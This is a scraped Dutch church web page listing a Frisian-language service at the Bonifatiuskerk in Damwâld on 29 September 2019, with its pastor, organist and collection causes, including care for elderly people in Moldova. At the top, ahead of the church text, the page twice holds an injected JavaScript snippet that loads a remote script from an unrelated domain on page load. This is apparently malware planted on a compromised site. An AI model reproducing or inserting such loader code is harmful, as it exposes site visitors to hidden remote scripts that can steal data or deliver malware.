;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 29 september 2019 9:30 uur - PKN Damwâld
zondag 29 september 2019
09:30 uur

Kerkdienst zondag 29 september 2019 9:30 uur

Thema: Fryske tsjinst

Informatie

Voorganger:Dhr. G. H. Visser, Wâlterswâld
Organist:Jaap van der Horn
Thema:Fryske tsjinst
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Kwetsbare ouderen in Moldavië

Internationale Ouderendag - Zorg voor eenzame ouderen in Moldavië
In het armste land van Europa, Moldavië, staan chronisch zieke ouderen er alleen voor. Kinderen zijn veelal naar het buitenland vertrokken op zoek naar werk. In afgelegen dorpen, zonder voorzieningen, leven zieke en bedlegerige ouderen in erbarmelijke omstandigheden. Kerk in Actie steunt een organisatie van vrijwilligers en professionele zorgverleners die thuiszorg en stervensbegeleiding bieden aan eenzame ouderen. Collecteer deze zondag vóór Internationale Ouderendag (1 oktober) mee, zodat 400 ouderen liefdevolle thuiszorg krijgen en 210 vrijwilligers en professionals getraind worden om de juiste zorg te kunnen bieden.

Tweede collecte: Kerk
Uitganscollecte: Kerk